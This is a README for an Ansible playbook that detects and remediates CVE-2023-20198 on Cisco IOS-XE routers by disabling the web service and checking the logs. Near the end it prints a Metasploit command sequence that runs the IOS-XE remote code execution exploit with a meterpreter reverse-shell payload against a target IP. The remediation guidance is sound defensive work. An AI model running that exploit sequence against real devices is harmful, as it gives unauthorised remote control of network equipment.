This repository contains an Ansible playbook for remediating the CVE-2023-20198 vulnerability found in certain Cisco devices.
It does the following:
- Checks if the web service is running on the router by checking for the associated commands in the running config
- Disables the web service if running
- Saves the configuration if changed
- Checks the logs for signs of previous exploitation
CVE-2023-20198-Fix/
│
├── ansible.cfg # Ansible configuration file
├── group_vars/ # Directory for variables specific to groups of hosts
│ └── iosxe_devices.yml # Variable definitions for IOS-XE devices
├── inventory.yml # Inventory of hosts, including devices to target
└── remediate.yml # Playbook for remediating CVE-2023-20198
Ensure you have Ansible installed on your control machine. This playbook was written for Ansible 2.9 or newer.
Configure Ansible: Edit ansible.cfg to match your environment settings.
Update inventory.yml with the host details of your IOS-XE devices.
Define any necessary variables in group_vars/iosxe_devices.yml. This should include any common settings for your IOS-XE devices, such as connection settings and credentials.
To add a new IOS-XE device to the inventory, edit the inventory.yml file and append the new host under the appropriate group:
iosxe_devices:
hosts:
vulnerable_router01:
ansible_host: 192.168.1.3
# ... other necessary variables
Replace new_router01 with your device's hostname and the ansible_* variables with the actual values for your device.
If you need to update credentials or other settings for the group of IOS-XE devices, edit the group_vars/iosxe_devices.yml file:
---
ansible_network_os: ios
ansible_connection: network_cli
ansible_user: admin
ansible_password: admin_password # Lab use only, store credentials responsibly!
ansible_become_method: enable
ansible_become_password: admin_password # Lab use only, store credentials responsibly!
# ... other variables
To execute the playbook, use the following command:
ansible-playbook remediate.yml -i inventory.yml
use exploit/linux/misc/cisco_ios_xe_rce
set RHOST 192.168.10.242 # Your target IP
set target 1
set payload cmd/unix/python/meterpreter/reverse_tcp
check
exploit
Always test your changes in a controlled environment before running the playbook in production.
Store sensitive data such as passwords and secret keys using Ansible Vault. Do not store plaintext credentials in your inventory or group_vars files.
For additional security measures and best practices, consult Ansible's official documentation.
Please replace all placeholder values with actual data that corresponds to your environment. This README assumes a basic familiarity with Ansible concepts such as inventory, variables, and running playbooks.